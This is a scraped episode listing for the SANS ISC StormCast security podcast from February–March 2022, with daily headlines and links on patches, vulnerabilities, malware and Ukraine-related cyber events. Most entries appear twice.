Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+March+2022+Patch+Tuesday/28418/ Critical APC UPS Vulnerability https://www.armis.com/research/tlstorm/ Vulnerabilities in Firmware Affecting HP Devices https://www.binarly.io/news/BinarlyDiscovers16NewHighImpactVulnerabilitiesinFirmwareAffectingHPEnterpriseDevices/index.html
3/9/20225 minutes, 32 seconds
Episode Artwork

ISC StormCast for Wednesday, March 9th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+March+2022+Patch+Tuesday/28418/ Critical APC UPS Vulnerability https://www.armis.com/research/tlstorm/ Vulnerabilities in Firmware Affecting HP Devices https://www.binarly.io/news/BinarlyDiscovers16NewHighImpactVulnerabilitiesinFirmwareAffectingHPEnterpriseDevices/index.html
3/9/20225 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, March 8th, 2022

Ukraine Scam Followup https://isc.sans.edu/forums/diary/No+Bitcoin+No+Problem+Follow+Up+to+Last+Weeks+Donation+Scam/28412/ Dirty Pipe Linux Vulnerability https://dirtypipe.cm4all.com Mozilla Firefox and Thunderbird Vulnerability https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/ Azure AutoWarp https://orca.security/resources/blog/autowarp-microsoft-azure-automation-service-vulnerability/ Terramaster TOS Vulnerability https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ https://forum.terra-master.com/en/viewtopic.php?f=28&t=3030
3/7/20225 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, March 8th, 2022

Ukraine Scam Followup https://isc.sans.edu/forums/diary/No+Bitcoin+No+Problem+Follow+Up+to+Last+Weeks+Donation+Scam/28412/ Dirty Pipe Linux Vulnerability https://dirtypipe.cm4all.com Mozilla Firefox and Thunderbird Vulnerability https://www.mozilla.org/en-US/security/advisories/mfsa2022-09/ Azure AutoWarp https://orca.security/resources/blog/autowarp-microsoft-azure-automation-service-vulnerability/ Terramaster TOS Vulnerability https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ https://forum.terra-master.com/en/viewtopic.php?f=28&t=3030
3/7/20225 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, March 7th, 2022

Ukraine Dontation Scam https://isc.sans.edu/forums/diary/Scam+EMail+Impersonating+Red+Cross/28404/ Cogent Disconnects Russia https://www.washingtonpost.com/technology/2022/03/04/russia-ukraine-internet-cogent-cutoff/ Russia DDoS Lists https://safe-surf.ru/upload/ALRT/proxies.txt https://safe-surf.ru/upload/ALRT/referer_http_header.txt NVidia Stolen Certificates https://www.theregister.com/2022/03/05/nvidia_stolen_certificate/ https://twitter.com/cyb3rops/status/1499514240008437762 GitLab Vulnerabilities https://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/#unauthenticated-user-enumeration-on-graphql-api Cisco Patches https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-filewrite-87Q5YRk
3/7/20226 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, March 7th, 2022

Ukraine Dontation Scam https://isc.sans.edu/forums/diary/Scam+EMail+Impersonating+Red+Cross/28404/ Cogent Disconnects Russia https://www.washingtonpost.com/technology/2022/03/04/russia-ukraine-internet-cogent-cutoff/ Russia DDoS Lists https://safe-surf.ru/upload/ALRT/proxies.txt https://safe-surf.ru/upload/ALRT/referer_http_header.txt NVidia Stolen Certificates https://www.theregister.com/2022/03/05/nvidia_stolen_certificate/ https://twitter.com/cyb3rops/status/1499514240008437762 GitLab Vulnerabilities https://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/#unauthenticated-user-enumeration-on-graphql-api Cisco Patches https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-filewrite-87Q5YRk
3/7/20226 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, March 4th, 2022

Attackers Search For Exosed "LuCI" Folders https://isc.sans.edu/diary/28400 Alexa Versus Alexa https://arxiv.org/abs/2202.08619 Bypassing Google Cloud Armor https://kloudle.com/blog/piercing-the-cloud-armor-the-8kb-bypass-in-google-cloud-platform-waf Ukraine Updates https://www.golem.de/news/ausfall-angriff-auf-ka-sat-satellit-ueber-gatewaystation-in-ukraine-2203-163614.html https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/ https://www.bleepingcomputer.com/news/security/ukraine-says-local-govt-sites-hacked-to-push-fake-capitulation-news/
3/4/20227 minutes, 7 seconds
Episode Artwork

ISC StormCast for Friday, March 4th, 2022

Attackers Search For Exosed "LuCI" Folders https://isc.sans.edu/diary/28400 Alexa Versus Alexa https://arxiv.org/abs/2202.08619 Bypassing Google Cloud Armor https://kloudle.com/blog/piercing-the-cloud-armor-the-8kb-bypass-in-google-cloud-platform-waf Ukraine Updates https://www.golem.de/news/ausfall-angriff-auf-ka-sat-satellit-ueber-gatewaystation-in-ukraine-2203-163614.html https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/ https://www.bleepingcomputer.com/news/security/ukraine-says-local-govt-sites-hacked-to-push-fake-capitulation-news/
3/4/20227 minutes, 7 seconds
Episode Artwork

ISC StormCast for Thursday, March 3rd, 2022

The More Often Something is Repeated, the More True it Becomes https://isc.sans.edu/forums/diary/The+More+Often+Something+is+Repeated+the+More+True+It+Becomes+Dealing+with+Social+Media/28396/ Fortinet Bug https://www.fortiguard.com/psirt/FG-IR-21-028 IBM Updates https://www.ibm.com/blogs/psirt/ Google Updates https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop.html Conti Ransomware Leak https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/ Middle Box DDoS Attacks https://www.akamai.com/blog/security/tcp-middlebox-reflection
3/3/20225 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, March 3rd, 2022

The More Often Something is Repeated, the More True it Becomes https://isc.sans.edu/forums/diary/The+More+Often+Something+is+Repeated+the+More+True+It+Becomes+Dealing+with+Social+Media/28396/ Fortinet Bug https://www.fortiguard.com/psirt/FG-IR-21-028 IBM Updates https://www.ibm.com/blogs/psirt/ Google Updates https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop.html Conti Ransomware Leak https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/ Middle Box DDoS Attacks https://www.akamai.com/blog/security/tcp-middlebox-reflection
3/3/20225 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, March 2nd, 2022

Geoblocking when you can't Geoblock https://isc.sans.edu/forums/diary/Geoblocking+when+you+cant+Geoblock/28392/ IsaacWiper and HermeticWizard: New wiper and worm targeting Ukraine https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/ Memory Corruption Vulnerabilities in PJSIP https://jfrog.com/blog/jfrog-discloses-5-memory-corruption-vulnerabilities-in-pjsip-a-popular-multimedia-library/ Octa Patch for Advanced Server Access Client https://trust.okta.com/security-advisories/okta-advanced-server-access-client-cve-2022-24295 ViaSat Outage https://www.reuters.com/business/aerospace-defense/satellite-firm-viasat-probes-suspected-cyberattack-ukraine-elsewhere-2022-02-28/
3/2/20226 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, March 2nd, 2022

Geoblocking when you can't Geoblock https://isc.sans.edu/forums/diary/Geoblocking+when+you+cant+Geoblock/28392/ IsaacWiper and HermeticWizard: New wiper and worm targeting Ukraine https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/ Memory Corruption Vulnerabilities in PJSIP https://jfrog.com/blog/jfrog-discloses-5-memory-corruption-vulnerabilities-in-pjsip-a-popular-multimedia-library/ Octa Patch for Advanced Server Access Client https://trust.okta.com/security-advisories/okta-advanced-server-access-client-cve-2022-24295 ViaSat Outage https://www.reuters.com/business/aerospace-defense/satellite-firm-viasat-probes-suspected-cyberattack-ukraine-elsewhere-2022-02-28/
3/2/20226 minutes, 2 seconds
Episode Artwork

ISC StormCast for Tuesday, March 1st, 2022

PHP Patches Code Injection Flaw https://nvd.nist.gov/vuln/detail/CVE-2021-21708 https://bugs.php.net/bug.php?id=81708 Mozilla VPN Local Privilege Escalation https://www.mozilla.org/en-US/security/advisories/mfsa2022-08/ Google Captcha Breaking https://east-ee.com/2022/02/28/1367/ Samsung Encryption Vulnerability https://eprint.iacr.org/2022/208.pdf tshark Multiple IPs https://isc.sans.edu/forums/diary/TShark+Multiple+IP+Addresses/28386/
3/1/20226 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, March 1st, 2022

PHP Patches Code Injection Flaw https://nvd.nist.gov/vuln/detail/CVE-2021-21708 https://bugs.php.net/bug.php?id=81708 Mozilla VPN Local Privilege Escalation https://www.mozilla.org/en-US/security/advisories/mfsa2022-08/ Google Captcha Breaking https://east-ee.com/2022/02/28/1367/ Samsung Encryption Vulnerability https://eprint.iacr.org/2022/208.pdf tshark Multiple IPs https://isc.sans.edu/forums/diary/TShark+Multiple+IP+Addresses/28386/
3/1/20226 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, February 28th, 2022

Ukraine Update https://www.bleepingcomputer.com/news/security/ransomware-gangs-hackers-pick-sides-over-russia-invading-ukraine/ https://ddosecrets.com/wiki/Tetraedr https://twitter.com/YourAnonOne/status/1496965766435926039 https://www.wired.com/story/ukraine-it-army-russia-war-cyberattacks-ddos/ Odd Windows Behaviour with Fixed Addresses https://isc.sans.edu/forums/diary/Windows+Fixed+IPv4+Addresses+and+APIPA/28380/ Using Snort IDS Rules in NetWitness Packet Decoder https://isc.sans.edu/forums/diary/Using+Snort+IDS+Rules+with+NetWitness+PacketDecoder/28382/ NVidia Breach https://www.bloomberg.com/news/articles/2022-02-25/nvidia-is-investigating-cyber-attack-but-business-uninterrupted Windows 11 Reset Not Removing All Data https://docs.microsoft.com/en-us/windows/release-health/status-windows-11-21h2#2783msgdesc
2/28/20225 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, February 28th, 2022

Ukraine Update https://www.bleepingcomputer.com/news/security/ransomware-gangs-hackers-pick-sides-over-russia-invading-ukraine/ https://ddosecrets.com/wiki/Tetraedr https://twitter.com/YourAnonOne/status/1496965766435926039 https://www.wired.com/story/ukraine-it-army-russia-war-cyberattacks-ddos/ Odd Windows Behaviour with Fixed Addresses https://isc.sans.edu/forums/diary/Windows+Fixed+IPv4+Addresses+and+APIPA/28380/ Using Snort IDS Rules in NetWitness Packet Decoder https://isc.sans.edu/forums/diary/Using+Snort+IDS+Rules+with+NetWitness+PacketDecoder/28382/ NVidia Breach https://www.bloomberg.com/news/articles/2022-02-25/nvidia-is-investigating-cyber-attack-but-business-uninterrupted Windows 11 Reset Not Removing All Data https://docs.microsoft.com/en-us/windows/release-health/status-windows-11-21h2#2783msgdesc
2/28/20225 minutes, 35 seconds
Episode Artwork

ISC StormCast for Friday, February 25th, 2022

Ukraine Update: Webcast https://www.sans.org/webcasts/russian-cyber-attack-escalation-in-ukraine/ Other Ukraine Related Stories https://isc.sans.edu/forums/diary/Ukraine+Russia+Situation+From+a+Domain+Names+Perspective/28376/ https://detection.watchguard.com Zabbix Vulnerablity Exploited https://www.cisa.gov/uscert/ncas/current-activity/2022/02/22/cisa-adds-two-known-exploited-vulnerabilities-catalog https://support.zabbix.com/browse/ZBX-20350 Asustore Victim of Deadbolt Ransomware https://forum.asustor.com/viewtopic.php?f=45&t=12630 Firepower Rule Update Failure After March 5th 2022 https://www.cisco.com/c/en/us/support/docs/field-notices/723/fn72332.html?emailclick=CNSemail Social Media Takeover Malware Distrubeted Via Microsoft App Store https://research.checkpoint.com/2022/new-malware-capable-of-controlling-social-media-accounts-infects-5000-machines-and-is-actively-being-distributed-via-gaming-applications-on-microsofts-official-store/
2/25/20226 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, February 25th, 2022

Ukraine Update: Webcast https://www.sans.org/webcasts/russian-cyber-attack-escalation-in-ukraine/ Other Ukraine Related Stories https://isc.sans.edu/forums/diary/Ukraine+Russia+Situation+From+a+Domain+Names+Perspective/28376/ https://detection.watchguard.com Zabbix Vulnerablity Exploited https://www.cisa.gov/uscert/ncas/current-activity/2022/02/22/cisa-adds-two-known-exploited-vulnerabilities-catalog https://support.zabbix.com/browse/ZBX-20350 Asustore Victim of Deadbolt Ransomware https://forum.asustor.com/viewtopic.php?f=45&t=12630 Firepower Rule Update Failure After March 5th 2022 https://www.cisco.com/c/en/us/support/docs/field-notices/723/fn72332.html?emailclick=CNSemail Social Media Takeover Malware Distrubeted Via Microsoft App Store https://research.checkpoint.com/2022/new-malware-capable-of-controlling-social-media-accounts-infects-5000-machines-and-is-actively-being-distributed-via-gaming-applications-on-microsofts-official-store/
2/25/20226 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, February 24th, 2022

New Sandworm Malware Cyclops Blink Replaces VPNFilter https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter Wiper Malware Seen Deployed Against Targets in the Ukraine https://twitter.com/juanandres_gs/status/1496581710368358400 https://twitter.com/ESETresearch/status/1496581903205511181 The Rise and Fall of log4shell https://isc.sans.edu/forums/diary/The+Rise+and+Fall+of+log4shell/28372/ pfsense authenticated RCE https://www.shielder.it/advisories/pfsense-remote-command-execution/ BVP47 Backdoor https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en.pdf
2/24/20226 minutes, 58 seconds
Episode Artwork

ISC StormCast for Thursday, February 24th, 2022

New Sandworm Malware Cyclops Blink Replaces VPNFilter https://www.ncsc.gov.uk/news/joint-advisory-shows-new-sandworm-malware-cyclops-blink-replaces-vpnfilter Wiper Malware Seen Deployed Against Targets in the Ukraine https://twitter.com/juanandres_gs/status/1496581710368358400 https://twitter.com/ESETresearch/status/1496581903205511181 The Rise and Fall of log4shell https://isc.sans.edu/forums/diary/The+Rise+and+Fall+of+log4shell/28372/ pfsense authenticated RCE https://www.shielder.it/advisories/pfsense-remote-command-execution/ BVP47 Backdoor https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en.pdf
2/24/20226 minutes, 58 seconds
Episode Artwork

ISC StormCast for Wednesday, February 23rd, 2022

A Good Old Equation Editor Vulnerablity Deliverying Malware https://www.welivesecurity.com/2022/02/22/teenage-cybercrime-stop-kids-wrong-path/ Horde Webmail 5.2.22 - Account Takeover via Email https://blog.sonarsource.com/horde-webmail-account-takeover-via-email NoVNC Phishing https://mrd0x.com/bypass-2fa-using-novnc/
2/23/20226 minutes, 30 seconds
Episode Artwork

ISC StormCast for Wednesday, February 23rd, 2022

A Good Old Equation Editor Vulnerablity Deliverying Malware https://www.welivesecurity.com/2022/02/22/teenage-cybercrime-stop-kids-wrong-path/ Horde Webmail 5.2.22 - Account Takeover via Email https://blog.sonarsource.com/horde-webmail-account-takeover-via-email NoVNC Phishing https://mrd0x.com/bypass-2fa-using-novnc/
2/23/20226 minutes, 30 seconds
Episode Artwork

ISC StormCast for Tuesday, February 22nd, 2022

Sending an Email to an IPv4 Address https://isc.sans.edu/forums/diary/Sending+an+Email+to+an+IPv4+Address/28362/ SMS Phone-Verified Account Services https://www.trendmicro.com/en_us/research/22/b/sms-pva-services-use-of-infected-android-phones-reveals-flaws-in-sms-verification.html Xenomorph Android Banking Trojan https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html Modified CryptBot Infostealer Going After Crypto Wallets https://asec.ahnlab.com/en/31802/ Clarification for Adobe Magento Vulnerabilties https://helpx.adobe.com/security/products/magento/apsb22-12.html
2/22/20225 minutes, 55 seconds
Episode Artwork

ISC StormCast for Tuesday, February 22nd, 2022

Sending an Email to an IPv4 Address https://isc.sans.edu/forums/diary/Sending+an+Email+to+an+IPv4+Address/28362/ SMS Phone-Verified Account Services https://www.trendmicro.com/en_us/research/22/b/sms-pva-services-use-of-infected-android-phones-reveals-flaws-in-sms-verification.html Xenomorph Android Banking Trojan https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html Modified CryptBot Infostealer Going After Crypto Wallets https://asec.ahnlab.com/en/31802/ Clarification for Adobe Magento Vulnerabilties https://helpx.adobe.com/security/products/magento/apsb22-12.html
2/22/20225 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, February 21st, 2022

Remcos RAT Delivered Through Doube Compressed Archive https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/ Cassandra User-Defined Functions Remote Code Execution https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/ Apple T2 Weakness https://www.forensicfocus.com/news/passware-kit-forensic-t2-add-on-the-first-password-recovery-tool-for-macs-with-t2-chips/ snap priviledge escalation https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt
2/21/20225 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, February 21st, 2022

Remcos RAT Delivered Through Doube Compressed Archive https://isc.sans.edu/forums/diary/Remcos+RAT+Delivered+Through+Double+Compressed+Archive/28354/ Cassandra User-Defined Functions Remote Code Execution https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/ Apple T2 Weakness https://www.forensicfocus.com/news/passware-kit-forensic-t2-add-on-the-first-password-recovery-tool-for-macs-with-t2-chips/ snap priviledge escalation https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt
2/21/20225 minutes, 4 seconds
Episode Artwork

ISC StormCast for Friday, February 18th, 2022

Hackers Attach Malicious .exe Files to Teams Conversations https://www.avanan.com/blog/hackers-attach-malicious-.exe-files-to-teams-conversations Thunderbird Patches https://www.mozilla.org/en-US/security/advisories/mfsa2022-07/ Cisco Secure Email Gateway Update https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-dos-MxZvGtgU GitHub Code Scanning Finds More Vulnerabilities Using Machine Learning https://github.blog/2022-02-17-code-scanning-finds-vulnerabilities-using-machine-learning/ Exploit for Magento Vulnerability (CVE-2022-24086) Available https://twitter.com/ptswarm/status/1494240197915123713 More Packet Fu With Zeek https://isc.sans.edu/forums/diary/More+packet+fu+with+zeek/28350/
2/18/20225 minutes, 17 seconds
Episode Artwork

ISC StormCast for Friday, February 18th, 2022

Hackers Attach Malicious .exe Files to Teams Conversations https://www.avanan.com/blog/hackers-attach-malicious-.exe-files-to-teams-conversations Thunderbird Patches https://www.mozilla.org/en-US/security/advisories/mfsa2022-07/ Cisco Secure Email Gateway Update https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-dos-MxZvGtgU GitHub Code Scanning Finds More Vulnerabilities Using Machine Learning https://github.blog/2022-02-17-code-scanning-finds-vulnerabilities-using-machine-learning/ Exploit for Magento Vulnerability (CVE-2022-24086) Available https://twitter.com/ptswarm/status/1494240197915123713 More Packet Fu With Zeek https://isc.sans.edu/forums/diary/More+packet+fu+with+zeek/28350/
2/18/20225 minutes, 17 seconds
Episode Artwork

ISC StormCast for Thursday, February 17th, 2022

Astaroth (Guildma) Infection https://isc.sans.edu/forums/diary/Astaroth+Guildma+infection/28346/ Atlassian Jira Updates https://jira.atlassian.com/browse/CONFSERVER-66550 VMWare Updates https://www.vmware.com/security/advisories/VMSA-2022-0004.html FBI Warns of BEC Using Virtual Meeting Platforms https://www.ic3.gov/Media/Y2022/PSA220216
2/17/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, February 17th, 2022

Astaroth (Guildma) Infection https://isc.sans.edu/forums/diary/Astaroth+Guildma+infection/28346/ Atlassian Jira Updates https://jira.atlassian.com/browse/CONFSERVER-66550 VMWare Updates https://www.vmware.com/security/advisories/VMSA-2022-0004.html FBI Warns of BEC Using Virtual Meeting Platforms https://www.ic3.gov/Media/Y2022/PSA220216
2/17/20225 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, February 16th, 2022

Who Are Those Bots? https://isc.sans.edu/forums/diary/Who+Are+Those+Bots/28342/ SquirrelWaffle Adds a Twist of Fraud to Exchange Server Malspamming https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/ Details About Western Digital MyCloud Flaw https://www.iot-inspector.com/blog/advisory-western-digital-my-cloud-pro-series-pr4100-rce/ Nooie Baby Monitor Vulnerabilities https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-nooie-baby-monitor/
2/16/20225 minutes, 42 seconds
Episode Artwork

ISC StormCast for Wednesday, February 16th, 2022

Who Are Those Bots? https://isc.sans.edu/forums/diary/Who+Are+Those+Bots/28342/ SquirrelWaffle Adds a Twist of Fraud to Exchange Server Malspamming https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/ Details About Western Digital MyCloud Flaw https://www.iot-inspector.com/blog/advisory-western-digital-my-cloud-pro-series-pr4100-rce/ Nooie Baby Monitor Vulnerabilities https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-nooie-baby-monitor/
2/16/20225 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, February 15th, 2022

Reminder: Decoding TLS Client Hello to Non TLS Servers https://isc.sans.edu/forums/diary/Reminder+Decoding+TLS+Client+Hellos+to+non+TLS+servers/28338/ Magento 2 Critical Vulnerability https://sansec.io/research/magento-2-cve-2022-24086 BigSur/Catalina Mystery Update https://support.apple.com/en-us/HT201222 MacOS Monterey Patch and Microsoft Defender https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/mde-apparently-blocks-macos-monterey-12-1-12-2-upgrades/m-p/3078793 Google Chrome 0-Day Fixed https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html Moxa MXview Vulnerabilities and Patch https://www.claroty.com/2022/02/10/blog-research-securing-network-management-systems-moxa-mxview/
2/15/20225 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, February 15th, 2022

Reminder: Decoding TLS Client Hello to Non TLS Servers https://isc.sans.edu/forums/diary/Reminder+Decoding+TLS+Client+Hellos+to+non+TLS+servers/28338/ Magento 2 Critical Vulnerability https://sansec.io/research/magento-2-cve-2022-24086 BigSur/Catalina Mystery Update https://support.apple.com/en-us/HT201222 MacOS Monterey Patch and Microsoft Defender https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/mde-apparently-blocks-macos-monterey-12-1-12-2-upgrades/m-p/3078793 Google Chrome 0-Day Fixed https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html Moxa MXview Vulnerabilities and Patch https://www.claroty.com/2022/02/10/blog-research-securing-network-management-systems-moxa-mxview/
2/15/20225 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, February 14th, 2022

CinaRAT Delivered Through HTML ID Attributes https://isc.sans.edu/forums/diary/CinaRAT+Delivered+Through+HTML+ID+Attributes/28330/ Windows Defender ASR Blocks LSASS Credential Stealing https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-credential-stealing-from-the-windows-local-security-authority-subsystem Brave Blocking Credential Leaking Extension https://www.theregister.com/2022/02/12/facebook_god_mode/ Project Zero Summary of Zero Day Bugs https://googleprojectzero.blogspot.com/2022/02/a-walk-through-project-zero-metrics.html
2/14/20225 minutes, 3 seconds
Episode Artwork

ISC StormCast for Monday, February 14th, 2022

CinaRAT Delivered Through HTML ID Attributes https://isc.sans.edu/forums/diary/CinaRAT+Delivered+Through+HTML+ID+Attributes/28330/ Windows Defender ASR Blocks LSASS Credential Stealing https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-credential-stealing-from-the-windows-local-security-authority-subsystem Brave Blocking Credential Leaking Extension https://www.theregister.com/2022/02/12/facebook_god_mode/ Project Zero Summary of Zero Day Bugs https://googleprojectzero.blogspot.com/2022/02/a-walk-through-project-zero-metrics.html
2/14/20225 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, February 11th, 2022

iOS/iPadOS/macOS/Safari 0-Day Vulnerability in WebKit https://support.apple.com/en-us/HT213091 Zyxel Network Storage Devics Hunted By Mirai Variant https://isc.sans.edu/forums/diary/Zyxel+Network+Storage+Devices+Hunted+By+Mirai+Variant/28324/ WMIC Removal https://docs.microsoft.com/en-us/windows/deployment/planning/windows-10-deprecated-features Zoom Uses Microphone after Meeting is Over https://community.zoom.com/t5/Meetings/Why-is-the-Zoom-app-listening-on-my-microphone-when-not-in-a/td-p/29019 Evidence Planted to Implicate Innocent Activists https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/
2/11/20226 minutes, 2 seconds
Episode Artwork

ISC StormCast for Friday, February 11th, 2022

iOS/iPadOS/macOS/Safari 0-Day Vulnerability in WebKit https://support.apple.com/en-us/HT213091 Zyxel Network Storage Devics Hunted By Mirai Variant https://isc.sans.edu/forums/diary/Zyxel+Network+Storage+Devices+Hunted+By+Mirai+Variant/28324/ WMIC Removal https://docs.microsoft.com/en-us/windows/deployment/planning/windows-10-deprecated-features Zoom Uses Microphone after Meeting is Over https://community.zoom.com/t5/Meetings/Why-is-the-Zoom-app-listening-on-my-microphone-when-not-in-a/td-p/29019 Evidence Planted to Implicate Innocent Activists https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/
2/11/20226 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, February 10th, 2022

Example of Cobalt Strike form Emotet Infection https://isc.sans.edu/forums/diary/Example+of+Cobalt+Strike+from+Emotet+infection/28318/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html Intel Updates https://www.intel.com/content/www/us/en/security-center/default.html NaturalFreshMall: A Mass Store Attack https://sansec.io/research/naturalfreshmall-mass-hack
2/10/20226 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, February 10th, 2022

Example of Cobalt Strike form Emotet Infection https://isc.sans.edu/forums/diary/Example+of+Cobalt+Strike+from+Emotet+infection/28318/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html Intel Updates https://www.intel.com/content/www/us/en/security-center/default.html NaturalFreshMall: A Mass Store Attack https://sansec.io/research/naturalfreshmall-mass-hack
2/10/20226 minutes, 23 seconds
Episode Artwork

ISC StormCast for Wednesday, February 9th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+February+2022+Patch+Tuesday/28316/ Google Cloud Virtual Machine Threat Detection https://cloud.google.com/security-command-center/docs/concepts-vm-threat-detection-overview Android Patches https://source.android.com/security/bulletin/2022-02-01 SAP Patches https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022 Podcast 13 Year Anniversary https://isc.sans.edu/podcastdetail.html?id=25
2/9/20225 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, February 9th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+February+2022+Patch+Tuesday/28316/ Google Cloud Virtual Machine Threat Detection https://cloud.google.com/security-command-center/docs/concepts-vm-threat-detection-overview Android Patches https://source.android.com/security/bulletin/2022-02-01 SAP Patches https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022 Podcast 13 Year Anniversary https://isc.sans.edu/podcastdetail.html?id=25
2/9/20225 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, February 8th, 2022

web3 phishing via self-customizign landing pages https://isc.sans.edu/forums/diary/web3+phishing+via+selfcustomizing+landing+pages/28312/ MSFT Blocking Office VBA Malcros https://www.theverge.com/2022/2/7/22922032/microsoft-block-office-vba-macros-default-change https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805 Acronis True Image Update https://security-advisory.acronis.com/updates/UPD-2201-f76f-838c Lockbit 2 IoCs https://www.ic3.gov/Media/News/2022/220204.pdf
2/8/20225 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, February 8th, 2022

web3 phishing via self-customizign landing pages https://isc.sans.edu/forums/diary/web3+phishing+via+selfcustomizing+landing+pages/28312/ MSFT Blocking Office VBA Malcros https://www.theverge.com/2022/2/7/22922032/microsoft-block-office-vba-macros-default-change https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805 Acronis True Image Update https://security-advisory.acronis.com/updates/UPD-2201-f76f-838c Lockbit 2 IoCs https://www.ic3.gov/Media/News/2022/220204.pdf
2/8/20225 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, February 7th, 2022

Intuit warns of new phishing scams https://security.intuit.com/security-notices IRS working with ID.me https://www.irs.gov/newsroom/new-identity-verification-process-to-access-certain-irs-online-tools-and-services Argo CD Vulnerability https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/ https://github.com/argoproj/argo-cd/security/advisories/GHSA-63qx-x74g-jcr7 Thermal Imaging of PoE Devices https://isc.sans.edu/forums/diary/Power+over+Ethernet+and+Thermal+Imaging/28308/
2/7/20226 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, February 7th, 2022

